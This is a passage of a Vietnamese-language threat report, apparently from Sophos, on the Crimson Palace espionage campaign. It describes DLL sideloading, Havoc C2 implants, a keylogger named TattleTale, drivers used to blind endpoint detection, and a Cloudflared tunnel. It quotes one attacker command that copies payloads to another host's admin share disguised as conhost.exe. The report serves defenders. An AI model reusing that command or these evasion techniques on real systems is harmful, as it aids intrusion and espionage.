Vào ngày 8 và 12 tháng 4, các tác nhân đã thực hiện ba lần tải phụ khác nhau bằng cách lạm dụng thành phần identity_helper.exe hợp lệ của trình duyệt Edge để tải phụ các DLL độc hại có tên là msedge_elf.dll. DLL này là trình tải Donut mang tải trọng Havoc C2 dưới dạng tệp nhị phân, tệp này sẽ được đưa vào bộ nhớ khi giải mã. Trong hai trường hợp, tải trọng Havoc đi kèm đã được mã hóa đã được gửi vào C:\Windows\temp\temp.log và được kết nối với máy chủ C2 tại 64.176.37.107:443 (được định vị địa lý tại Canada); trong một trường hợp khác, nó đã được thả vào cùng một vị trí với DLL có tên log.ini và được kết nối đến 45.77.46.245:443 (được định vị địa lý tại Hoa Kỳ).
Vào ngày 10 tháng 4, các tác nhân đã sử dụng một jconsole.exe được đổi tên khác, lần này đổi tên thành firefox.exe, trong một nỗ lực tương tự như cuộc tấn công ExecIT tháng 3. Trình tải shellcode trong trường hợp này không được phục hồi, nhưng cấy ghép Havoc đã được đưa vào firefox.exe và kết nối đến 64.176.37.107:443, giống như hai trong số những lần được đưa vào bởi trình tải Donut đã làm. Vào ngày 12 tháng 4, một nỗ lực thứ tư để tận dụng identity_helper.exe—lần này được đổi tên thành fireconf.exe—đã bị bảo vệ điểm cuối của Sophos chặn ngay lập tức.
Cùng thời điểm đó, các tác nhân đã triển khai một biến thể trình tải shellcode của msedge_elf.dll dưới dạng một tệp thực thi độc lập (pp.exe).
cmd /c “sao chép c:\users\public\temp.log \\172.xxx.xxx.xxx\c$\windows\temp && sao chép c:\users\public\pp.exe\\172.xxx.xxx.xxx \c$\perflogs\conhost.exe”
Cũng vào đầu tháng 4, chúng tôi đã quan sát thấy hai công cụ keylogger khác nhau được triển khai đến cùng một máy chủ cùng một lúc, một trong số đó là phần mềm độc hại chưa được báo cáo trước đó mà chúng tôi đặt tên là TattleTale — một keylogger có các khả năng bổ sung. Chúng tôi đã quan sát thấy việc sử dụng công cụ này sớm nhất là vào tháng 8 năm 2023 nhưng trước đó không thể chụp được mẫu. Các keylogger đã được triển khai đến các tài khoản người dùng quản trị mục tiêu cụ thể và các tài khoản khác đáng quan tâm.
TattleTale được triển khai dưới dạng tệp r2.exe và được tạo trên đĩa bởi identity_helper.exe. Theo phân tích của Sophos X-Ops, phần mềm độc hại có thể lấy dấu vân tay hệ thống bị xâm phạm và kiểm tra các ổ đĩa vật lý và mạng được gắn kết bằng cách mạo danh người dùng đã đăng nhập. TattleTale cũng thu thập tên bộ điều khiển miền và đánh cắp Chính sách thông tin truy vấn LSA (Cơ quan bảo mật cục bộ), được biết là chứa thông tin nhạy cảm liên quan đến chính sách mật khẩu, cài đặt bảo mật và đôi khi là mật khẩu được lưu trong bộ nhớ đệm. Khả năng ghi phím của TattleTale bao gồm thu thập dữ liệu lưu trữ và trình duyệt Edge và Chrome, lưu dữ liệu đã thu thập này vào tệp .pvk được đặt theo tên của tổ chức nạn nhân. Đầu ra của phần mềm ghi phím được mã hóa cứng vào mẫu, do đó thư mục đầu ra của nó có khả năng thay đổi tùy theo từng mẫu.
Các tác nhân đã triển khai keylogger r1.exe cùng với hai trình điều khiển, C:\users\public\rsndispot.sys và C:\users\public\kl.sys, để tạm thời vô hiệu hóa dữ liệu từ xa EDR. r1.exe được thực thi bởi một tệp có tên 2.bat và thiết lập liên lạc đến một địa chỉ vòng lặp. Sau đó, r1.exe truy cập vào các tệp cơ sở dữ liệu được bảo vệ của Chrome.
Trên cùng một hệ thống quản trị mục tiêu, các tác nhân cũng triển khai một keylogger khác (‘c:\users\public\dd.dat’), đầu ra của keylogger này sẽ được lưu dưới dạng tệp .dat (‘C:\Users\Public\log.dat’).
Tháng 6 năm 2024: Cloudflared
Vào ngày 13 tháng 6, trong một động thái khác gợi nhớ nhiều hơn đến các cuộc xâm nhập của tội phạm mạng, các tác nhân đã sử dụng Impacket để cài đặt máy khách đường hầm Cloudflared trên một thiết bị duy nhất. Trước khi cài đặt, chúng đã có thể vô hiệu hóa dữ liệu từ xa điểm cuối từ thiết bị mục tiêu, do đó việc triển khai đường hầm không được báo cáo cho đến khi phản hồi sự cố kích hoạt lại bảo vệ điểm cuối vào cuối tháng đó.
Kết luận
Các cuộc xâm nhập và hoạt động được ghi lại trong báo cáo này vẫn tiếp diễn. Chúng tôi tiếp tục thấy các dấu hiệu của các nhóm hoạt động đe dọa mà chúng tôi đã xác định trong báo cáo ban đầu khi chúng cố gắng xâm nhập vào các mạng khác của khách hàng Sophos trong cùng khu vực.
Trong suốt quá trình giao tranh, kẻ thù dường như liên tục thử nghiệm và tinh chỉnh các kỹ thuật, công cụ và hoạt động của chúng. Khi chúng tôi triển khai các biện pháp đối phó với phần mềm độc hại tùy chỉnh của chúng, chúng kết hợp việc sử dụng các công cụ do chúng phát triển tùy chỉnh với các công cụ chung, mã nguồn mở thường được các nhà kiểm tra xâm nhập hợp pháp sử dụng, thử nghiệm các kết hợp khác nhau.
Chiến dịch gián điệp mạng này đã được phát hiện thông qua dịch vụ săn tìm mối đe dọa do con người điều hành của Sophos MDR, đóng vai trò quan trọng trong việc chủ động xác định hoạt động đe dọa. Ngoài việc tăng cường hoạt động của MDR, dịch vụ săn tìm mối đe dọa MDR còn đưa vào đường ống phân tích phần mềm độc hại X-Ops của chúng tôi để cung cấp khả năng bảo vệ và phát hiện được cải tiến.
Cuộc điều tra về chiến dịch này chứng minh tầm quan trọng của một chu trình tình báo hiệu quả, phác thảo cách thức một cuộc săn lùng mối đe dọa xuất phát từ một phát hiện gia tăng có thể tạo ra thông tin tình báo để phát triển các phát hiện mới và khởi động các cuộc săn lùng bổ sung.
Các chỉ số về sự xâm phạm cho hoạt động Crimson Palace bổ sung này có sẵn trên trang GitHub của Sophos tại đây . Để có cái nhìn sâu sắc về cuộc săn lùng mối đe dọa đằng sau chiến dịch gián điệp mạng kéo dài gần hai năm này, hãy đăng ký tham gia hội thảo trực tuyến, “ Intrigue of the Hunt: Operation Crimson Palace: Vạch trần một chiến dịch do nhà nước tài trợ nhiều đầu ”.
